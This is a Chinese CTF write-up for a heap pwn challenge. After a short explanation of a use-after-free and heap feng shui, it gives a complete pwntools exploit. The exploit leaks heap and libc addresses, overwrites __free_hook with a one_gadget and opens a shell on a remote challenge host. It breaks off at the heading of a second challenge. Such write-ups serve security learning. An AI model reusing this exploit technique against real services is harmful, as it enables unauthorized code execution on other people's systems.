copy:
这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'
binary = 'copy11'
elf = ELF('copy11')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
host = "183.129.189.60"
port = 10034
p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla("choice:",str(idx))
def add(idx,size,payload):
cmd(idx)
if idx == 1:
cmd(1)
sla("input size:",str(size))
sa("input data:",payload)
else:
cmd(1)
sa("input data:",payload)
def free(idx,idx1):
cmd(idx)
cmd(2)
sla("index?\n",str(idx1))
def show(idx,idx1):
cmd(idx)
cmd(3)
sla("index?\n",str(idx1))
add(1,0x90,"a")
free(1,0)
add(1,0x90,"aaa")
show(1,0)
ru("data: ")
heap_addr = u64(p.recv(6).ljust(8,"\x00"))
lg("heap_addr",heap_addr)
add(1,0x90,p64(heap_addr-0x11f00-0xb0+0x10))
free(1,0)
free(1,1)
add(2,0x90,p64(heap_addr-0x11e00-0xb0+0x10))
payload = p64(0x101)+p64(0x0108)
payload += p64(0)*6
payload += p64(heap_addr-0x11e00-0xb0+0x10+0x60)
payload += p64(heap_addr+0xa0)
payload += p64(0)+p64(0x31)
payload += p64(0)*3+p64(0x21)
payload += p64(heap_addr+0xb0+0x10-0x20)
payload += p64(heap_addr-0x11e00-0xb0+0x10+0x50)
add(2,0x90,payload)
show(1,0)
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
sys_addr = libc_base+libc.sym["system"]
payload = p64(0)*5+p64(0x31)+p64(0)*5
o_g = [0x4f2c5,0x4f322,0x10a38c]
one = o_g[1]+libc_base
free(2,1)
add(2,0x90,payload)
add(1,0x18,p64(free_hook)*3)
free(1,1)
add(1,0x60,p64(one))
# gdb.attach(p)
p.interactive()
easyheap:
溢出点:
libc2.27下的off by null可以参考cnitlrt,本题和我的简书上的第二个题的利用手法类似加了个沙盒: